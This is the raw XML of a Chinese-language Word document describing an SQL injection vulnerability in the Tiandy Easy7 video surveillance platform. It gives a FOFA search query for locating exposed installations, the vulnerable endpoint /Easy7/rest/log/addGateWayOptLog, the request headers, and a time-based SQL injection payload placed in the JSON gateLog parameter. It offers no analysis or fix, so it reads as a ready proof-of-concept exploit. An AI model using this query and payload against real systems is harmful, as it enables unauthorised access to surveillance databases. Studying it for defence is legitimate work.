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DB6E2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>天地伟业Easy7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addGateWayOptLog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL注入</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF6F67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566A7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FOFA：app="Tiandy-Easy7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B0FDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F3467A"/>
    <w:p w14:paraId="7EC55AAB"/>
    <w:p w14:paraId="4F3B8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E72E5BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033AAC1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/Easy7/rest/log/addGateWayOptLog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79B6F5C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0648FC3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rv:139.0)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Firefox/139.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E894E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text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44B67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zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAE41E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4354D14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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BAAB5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4556704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gateLog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{"gateLogList":[{"ch_code":"1'union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select sleep(3)--+","ch_caption":"1","dt_time":"1"}]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17066F99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AFFA5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15115"/>
    <w:rsid w:val="05276628"/>
    <w:rsid w:val="06E047F2"/>
    <w:rsid w:val="0CCD4209"/>
    <w:rsid w:val="14623234"/>
    <w:rsid w:val="1E974BE6"/>
    <w:rsid w:val="300E670C"/>
    <w:rsid w:val="31FE5396"/>
    <w:rsid w:val="377A54BF"/>
    <w:rsid w:val="3B5B6961"/>
    <w:rsid w:val="51932220"/>
    <w:rsid w:val="730A5F92"/>
    <w:rsid w:val="77E12415"/>
    <w:rsid w:val="7BF7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523</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>544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2025-06-26T10:04:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:21:17Z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049FA576ECAB436B8F1C314ACBCADB3A_12</vt:lpwstr>
  </property>
</Properties>
</file>